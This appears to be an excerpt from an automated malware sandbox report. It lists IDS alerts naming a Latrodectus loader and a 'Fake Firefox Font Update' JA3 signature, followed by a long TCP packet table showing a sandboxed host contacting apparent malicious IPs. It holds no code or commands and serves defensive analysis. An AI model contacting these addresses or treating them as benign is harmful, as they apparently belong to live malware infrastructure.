                                                                                                                                          2024-11-13T18:23:46.120580+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650083104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:46.122183+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650083104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:47.721691+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650084104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:47.723658+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650084104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:49.135574+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650085104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:49.188326+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650085104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:50.473952+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650086104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:50.475471+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650086104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:52.244014+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650087104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:52.245828+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650087104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:53.654205+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650088104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:53.655852+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650088104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:54.892301+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650089104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:54.894110+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650089104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:56.149717+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650090104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:56.151417+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650090104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:57.448972+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650091104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:57.450937+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650091104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:23:58.865757+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650092104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:23:58.867912+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650092104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:24:00.671218+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650093104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:24:00.673149+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650093104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:24:02.013688+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650094104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:24:02.015284+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650094104.21.15.162443TCP
                                                                                                                                          2024-11-13T18:24:03.637736+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650095104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:24:03.644319+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.650095104.21.92.105443TCP
                                                                                                                                          2024-11-13T18:24:06.448528+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.650096104.21.15.162443TCP

                                                                                                                                          Network Port Distribution

                                                                                                                                          TCP Packets

                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Nov 13, 2024 18:20:08.013587952 CET497109043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:08.018651009 CET90434971045.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:08.018743992 CET497109043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:08.035851002 CET497109043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:08.040848017 CET90434971045.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:08.843863010 CET90434971045.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:08.843885899 CET90434971045.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:08.843899012 CET90434971045.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:08.844002962 CET497109043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:08.844002962 CET497109043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:08.922575951 CET497109043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:08.927589893 CET90434971045.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:09.157723904 CET90434971045.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:09.157792091 CET497109043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:09.171855927 CET497109043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:09.177023888 CET90434971045.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:09.965925932 CET90434971045.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:09.966075897 CET497109043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:09.967336893 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:09.972197056 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:09.972568989 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:09.972568989 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:09.977514982 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:10.816196918 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:10.816216946 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:10.816231012 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:10.816241026 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:10.816257000 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:10.816297054 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:10.818747997 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:10.823702097 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.054130077 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.054204941 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.055361032 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.060201883 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.737626076 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.737644911 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.737657070 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.737668037 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.737682104 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.737700939 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.737917900 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.738114119 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.738148928 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.738183022 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.738214970 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.738229990 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.738234043 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.738542080 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.738574982 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.738603115 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.738626957 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.738646030 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.738658905 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.738676071 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.738694906 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.738701105 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.739336014 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.854839087 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.854975939 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.854985952 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.854995966 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.855007887 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.855019093 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.855089903 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.855149984 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.855468988 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.855576038 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.855592966 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.855603933 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.855627060 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.855926037 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.855926037 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.856079102 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.856132030 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.856142998 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.856278896 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.856291056 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.856360912 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.856360912 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.856770039 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.856848001 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.856859922 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.856889009 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.856899023 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.856911898 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.856923103 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.856934071 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.857815981 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.857850075 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.857884884 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.857933044 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.857933044 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.857933044 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.858052969 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.858063936 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.858253956 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.993092060 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.993143082 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.993212938 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.993247032 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.993283987 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.993293047 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.993293047 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.993293047 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.993293047 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.993333101 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.993367910 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.993419886 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.993419886 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.993422031 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.993472099 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.993504047 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.993537903 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.993545055 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.993585110 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.993588924 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.993602991 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.993623018 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.993655920 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.993665934 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.993665934 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.993689060 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.993737936 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.993767023 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.993767023 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.993801117 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.994736910 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.994771957 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.994805098 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.994831085 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.994839907 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.994848967 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.994878054 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.994884014 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.994904041 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.994914055 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.994946003 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.994946003 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.994947910 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.994982958 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.995007992 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.995043039 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.995069981 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.995102882 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.995152950 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.995186090 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.995218039 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.995242119 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.995242119 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.995242119 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.995242119 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.995250940 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.995285034 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.995343924 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.995343924 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.995343924 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.995351076 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.995471954 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.995922089 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.995973110 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.995978117 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.996006966 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.996066093 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.996082067 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.996082067 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.996098995 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.996133089 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.996165037 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.996212006 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.996212006 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.996212006 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.996222973 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.996370077 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.996371031 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.997195005 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.997231960 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.997268915 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.997291088 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.997317076 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.997324944 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.997337103 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.997366905 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.997390032 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.997400045 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.997435093 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:11.997513056 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.997513056 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:11.997513056 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.089565992 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.089596987 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.089618921 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.089705944 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.089808941 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.089924097 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.089982033 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.091049910 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.091097116 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.091172934 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.109945059 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.109982014 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.110007048 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.110033035 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.110047102 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.110066891 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.110102892 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.110121012 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.110160112 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.110179901 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.110193968 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.110217094 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.110228062 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.110234976 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.110260963 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.110274076 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.110317945 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.110455036 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.110487938 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.110521078 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.110521078 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.110548019 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.110554934 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.110589027 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.110596895 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.110598087 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.110671997 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.110780954 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.110831976 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.110882998 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.110884905 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.110896111 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.110919952 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.110927105 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.110956907 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.110992908 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.111001968 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.111001968 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.111001968 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.111077070 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.111274958 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.111309052 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.111330032 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.111360073 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.111382961 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.111433983 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.111454010 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.111468077 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.111502886 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.111529112 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.111529112 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.111537933 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.111563921 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.111573935 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.111592054 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.111608028 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.111639977 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.111639977 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.111947060 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.111979008 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.112030029 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.112030029 CET497119043192.168.2.645.143.166.230
                                                                                                                                          Nov 13, 2024 18:20:12.112030983 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.112065077 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.112102985 CET90434971145.143.166.230192.168.2.6
                                                                                                                                          Nov 13, 2024 18:20:12.112118006 CET497119043192.168.2.645.143.166.230
